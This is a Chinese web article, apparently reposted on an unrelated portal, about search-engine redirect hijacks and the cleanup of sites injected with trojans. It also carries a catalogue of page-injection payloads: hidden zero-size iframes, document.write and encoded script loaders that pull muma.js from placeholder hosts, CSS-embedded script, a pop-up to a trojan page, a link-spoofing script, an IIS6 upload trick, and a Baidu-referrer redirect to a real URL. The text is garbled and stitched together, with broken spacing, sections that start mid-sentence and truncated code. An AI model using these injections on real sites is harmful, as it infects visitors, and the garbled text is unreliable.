热门搜索:网页游戏 火箭球赛 热门音乐 2011世界杯 亚运会 黄海军演
您现在的位置:首页 >> 美食文化 >> 内容

关于用搜索引擎搜索出来网站跳转的问题解决和常见的挂马代码

时间:2014/12/11 13:25:04 点击:

 

 

  (信宜新闻网/讯)关于“网站直接输入域名正常进入,用搜索引擎搜索出来的链接点击进入,就直接跳转到其他网址”这个问题,相信很多用别人源码建网的站长都碰到过,那么要怎么解决呢,这个问题难倒了不少站长,请耐心看完本文。

 

      1.var regexp=/\.(baidu)(\.[a-z0-9\-]+) {1,2}\//ig;var where =document.referrer;if(regexp.test(whe re)){window.location.href=http://www.1xy.cc/bbs/thread-1970252-1-1.html"百度来的访客 带到 的地址"}把代码存到JS文件 然后网站 首页调用这个JS文件 就OK了

 

  2.改mdb、改后台登录名

 

  3.如果打开图片不显示就基本是JS挂马了

 

  4.把首页有关js/gif的文件都用文本打开检查

 

  5.重点检查数据库inc.asp、index.asp文件,看看里面是否被修改了数据库链接转向,有的黑客把Config.asp备份了一个,只不过备份的Config.asp名字改了,但是inc链接的是这个被改了名字的Config.asp。所以从搜索引擎进入就会跳转到别人网站。本人以前也遇到过这样的事情,后来把网站源码检查了一遍才找到这个inc.asp出了问题。

 

  二、.原来的文件即可。 修补漏洞(修补网站漏洞也就是做一下 网站安全。) 1、修改网站后台的用户名和密码及后 台的默认路径。 2、更改数据库名,如果是ACCESS数据 库,那文件的扩展名最好不要用mdb, 改成ASP的,文件名也可以多几个特殊 符号。 3、接着检查一下网站有没有注入漏洞 或跨站漏洞,如果有的话就相当打上防 注入或防跨站补丁。 4、检查一下网站的上传文件,常见了 有欺骗上传漏洞,就对相应的代码进行 过滤。 5、尽可能不要暴露网站的后台地址, 以免被社会工程学猜解出管理用户和密 码。 6、写入一些防挂马代码,让框架代码 等挂马无效。 7、禁用FSO权限也是一种比较绝的方 法。 8、修改网站部分文件夹的读写权限。 9、如果你是自己的服务器,那就不仅 要对你的网站程序做一下安全了,而且 要对你的服务器做一下安全也是很有必 要了! 补充一下:尽量不要下载网上的那一些 免费程序,因为那一些程序中大部分都有后门。

 

  三、如果你是自己写的代码,每一行什么含 义、什么作用肯定很清楚,一行一行查 找分析。 如果是别人代写的,或者是下载的,那 就让写的人帮助检查,或者使用备份文 件覆盖,或者重新下载一个覆盖被嵌入 恶意代码的页面。 如果这些条件都不具备,试着自己逐行 检查,看看是否有类似script、iframe 的字符,删除后检查还有没有恶意代码 嵌入的症状(记得做备份),还有要查 看有没有一串毫无意义的字符比 如“%B6%F1%D2%E2%B4%FA%C2%EB” 表示“恶意代码”四个字,只是经过简单 加密,正常网页中不应该出现。

 

  四、这个前缀是可以随意更换的,我 上面取名为"v",例如我可以换成: abc123:expression(this.src='about:b lank',this.outerHTML=''); 挂木马的家 伙得先看你的CSS里这个前缀,然后挂 马的时候写成这样<iframe style="abc123:expression() !important" src="URL"></iframe>,那 个前缀一定要是和你的网站一样的 (abc123),才能挂到马,哈哈哈!如 果把前缀做成动态的,就非常OK了, 看你怎么挂!

 

  五、知识重点:如何防止网站被挂马?挂 马代码大全 做网站的人知道也不小心 网站就被黑客挂了木马那个头痛呀! 首先引起了网友的反感。从些不在上 自己的网站。搜索还惩罚,真是倒霉 呀。下面我们就了解一下,网站是..

 

  六、如何防止网站被挂马?挂马代码大全

 

  做网站的人知道也不小心网站就被黑 客挂了木马那个头痛呀!首先引起了 网友的反感。从些不在上自己的网 站。搜索还惩罚,真是倒霉呀。下面 我们就了解一下,网站是如何中 毒的。

 

  1:框架挂马

 

  <iframe src=地址 width=0 height=0> </iframe>

 

  2:js文件挂马

 

  首先将以下代码

 

  document.write("<iframe width='0' height='0' src='地址'></iframe>");

 

  保存为xxx.js,

 

  则JS挂马代码为

 

  <script language=javascript src=xxx.js></script>

 

  3:js变形加密

 

  <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt> </script>

 

  muma.txt可改成任意后缀 电脑知识

 

  4:body挂马

 

  <body ></body>

 

  5:隐蔽挂马

 

  top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

 

  6:css中挂马

 

  body {

 

  background-image: url('javascript:document.write(" <script src=http://www.XXX.net/muma.js></script>")')}

 

  7:JAJA挂马

 

  <SCRIPT language=javascript>

 

  window.open ("地 址","","toolbar=no,location=no,directo ries=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

 

  </script>

 

  8:图片伪装

 

  <html>

 

  <iframe src="网马地址" height=0 width=0></iframe>

 

  <img src="图片地址"></center>

 

  </html>

 

  9:伪装调用:

 

  <frameset rows="444,0" cols="*">

 

  <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">

 

  <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

 

  </frameset>

 

  10:高级欺骗

 

  <a href="http://www.163.com(迷惑 连接地址,显示这个地址指向木马地 址)" > 页面要显示的内容 </a>

 

  <SCRIPT Language="JavaScript">

 

  function www_163_com ()

 

  {

 

  var url="网马地址";

 

  open(url,"NewWindow","toolbar=no,l ocation=no,directories=no,status=no ,menubar=no,scrollbars=no,resizable =no,copyhistory=yes,width=800,heig ht=600,left=10,top=10");

 

  }

 

  </SCRIPT>

 

  七、如何防止网站被挂马

 

  A。为什么好好的网站会有木马?一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严,程序上有 上传功能,没有进行文件目录和文件 后缀等的判断,一般这类的目录, 以“海阳顶端网ASP木马”较为流行。因2003平台IIS6原因,也存在目录名 问题引起ASP木马。( 微软的IIS 6存在 严重解析文件名错误

 

  测试办法:在FTP中建立一个 test.asp 的文件夹,文件夹名就是 test.asp ,在这个文件夹中上传一个 hack.jpg,这个jpg的内容可以直接 是,然后,用IE远程访问这个 hack.jpg,你可以发现,它一样被当 作是ASP文件来运行!显然,只要你 的网站程序,允许用户自己建立文件 夹及上传图片,黑客就可以上传图片 来当作ASP木马来运行。

 

  解决办法:所有使用星外虚拟主机管 理平台的虚拟主机用户,可以在主机 面板,设置执行权限选项中,直接将 有上传权限的目录,取消ASP的运行 权限,就可以解决这个问题。

 

  大家常用的动易2006和动网,BLOG 这类的程序,需要详细的检查一下, 并跟着开发者进行相应的安全程序升 级。这样才能减少因代码原因引起的

 

  现在最多见的JS挂马方法有两种 ,一种是直接将JavaScript脚本代码 写在网页中,当访问者在浏览网页时 ,恶意的挂马脚本就会通过用户的浏 览器悄悄地打开网马窗口,隐藏地运 行。

 

  这种方法使用的关键代码如下:

 

  window.open("http://www.hack er.com/木马.html","","toolbar=no,loca tion=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,hei ght=1");

 

  这种代码往往很长,很容易被安 全工程师发现,而且没有经验的黑客 也喜欢将“width”和“height=”参数设为 “0”,但是设置为0后,可能会出现恶 意代码不运行的情况。

 

  另外一种JS挂马方式是,黑客先 将挂马脚本代码“document.write('<If rame src="网页木马地址" >

 

  或者

 

  document.write("

 

  ")

 

  document.write(" ")

 

  document.write("

 

  ")

 

  就成功地将木马挂到了对方的网页中了。

 

  小提示:黑客还可以根据情况随机变换插入的JS挂马方法。删除一段和baidu以及http请求相关的VB代码即可!网站中被插入文件了,检查有无Global.asa 和Global.asax 文件.

 

 

作者:信宜人 录入:信宜人 来源:原创
相关评论
发表我的评论
  • 大名:
  • 内容:
  • 关于我们 | 服务条款 | 法律声明 | 文章发布 | 在线留言 | 法律支援 | 人员认证 | 投诉建议 | 合作联盟 | 版权所有 | 本站wap手机访问
  • 绍兴城市网(www.qapplego.com) © 2024 版权所有 All Rights Reserved.
  • 有害短信息举报 | 阳光·绿色网络工程 | 版权保护投诉指引 | 网络法制和道德教育基地 | 绍兴通管局

  • 绍兴城市网 版权所有,信息来自网络,不代表本站观点,如有疑问联系客服处理。QQ:501734467
  • #